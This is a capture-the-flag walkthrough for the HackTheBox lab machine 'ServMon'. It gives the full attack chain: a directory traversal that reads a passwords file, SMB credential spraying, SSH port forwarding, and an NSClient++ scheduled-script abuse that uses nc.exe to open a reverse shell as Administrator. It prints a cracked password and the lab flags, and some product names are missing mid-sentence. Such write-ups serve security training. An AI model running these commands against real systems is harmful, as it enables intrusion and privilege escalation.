nmap -T4 -p- -A -Pn -v servmon.htb
ftp servmon.htb
#anonymous login
#get both files
#get directory traversal exploit
python nvms.py
python nvms.py servmon.htb Windows/win.ini
python nvms.py servmon.htb Users/nathan/Desktop/Passwords.txt
#get possible passwords
vim usernames.txt
#nathan and nadine
vim passwords.txt
#from Passwords.txt
crackmapexec smb -u usernames.txt -p passwords.txt --shares servmon.htb --continue-on-success
#gives correct password for nadine
ssh [email protected]
type Desktop\user.txt
netstat -ano
#shows listening port at 8443
#running nsclient++
#ssh routing
ssh -L 8443: [email protected]
#get nsclient password
type "C:\Program Files\nsclient++\nsclient.ini"
#we can use password to login into localhost:8443
#in attacker machine
echo "C:\ProgramData\nc.exe 6666 -e cmd.exe" > evil.bat
python3 -m http.server
#in ssh session
cd C:\ProgramData
curl -o nc.exe
curl -o evil.bat
#now we can setup the scripts and schedules
#in nsclient++ interface
#according to given exploit
#in attacker machine
nc -nvlp 6666
#after script executes, we get shell as Administrator
Open ports & services:
- 21 - ftp - Microsoft ftpd
- 22 - ssh - OpenSSH for Windows 8.0
- 80 - http
- 135 - msrpc - Microsoft Windows RPC
- 139 - netbos-ssn - netbios-ssn
- 445 - microsoft-ds
- 5666 - tcpwrapped
- 6063 - tcpwrapped
- 6699 - napster
- 8443 - ssl/https-alt
- 49664-49670 - msrpc - msrpc
Starting with
enum, we can login using anonymous mode. -
There are two .txt files - both contain general notes for the users 'Nathan' and 'Nadine'.
The notes also suggest that the public access to NVMS has not been removed yet.
Checking the webpage on port 80, we can see that it is for
, we can see that there are directory traversal exploits forNVMS-1000
. -
We can get the exploit script from Github and run it to read files such as
Now, from the note earlier, it was given that Nathan's Desktop contains Passwords.txt - we can attempt to read this using the exploit.
We are able to read Passwords.txt in this way - this gives us multiple passwords.
We can attempt to brute-force logging into the system using the usernames and passwords enumerated so far.
With the help of
, we get the creds "nadine:L1k3B1gBut7s@W0rk" -
We can now log into SSH as nadine, and get user flag.
Now, earlier through
, we enumeratedNSClient++
on port 8443 (SSL/HTTPS). -
We can confirm this using
netstat -ano
- the Windows machine is listening on port 8443, and this service can be accessed internally only. -
So, using
SSH routing
, we can setup port forwarding such that we can access the service on our localhost at port 8443. -
Now, searching for exploits related to
give us a couple of manual exploits. -
For the exploit, in our SSH session, we need to get two files from our attacker machine -
file is for launching anc
connection to the attacker machine, for a reverse shell. -
Now, after this, we need to visit https://localhost:8443 to go to the NSClient++ interface.
The password required for login can be found in the file
C:\Program Files\nsclient++\nsclient.ini
Once we log in, we have to create a script to call
:Settings > External Scripts > Scripts > Add New
foobar - command = C:\\ProgramData\\evil.bat
We also need to create a schedule which calls the script every minute:
Settings > Scheduler > Schedules > Add New
foobar - interval = 1m
foobar - command = foobar
Setup a listener on attacker machine, and wait for a moment - this setting up of scripts and schedules may require multiple attempts.
After a while, we get reverse shell on our listener as Administrator, and we can read root flag.
1. User flag - 8287a10a9f74a9586a552c49450fb8d3
2. Root flag - 127218e211e64c5f95193692973787ce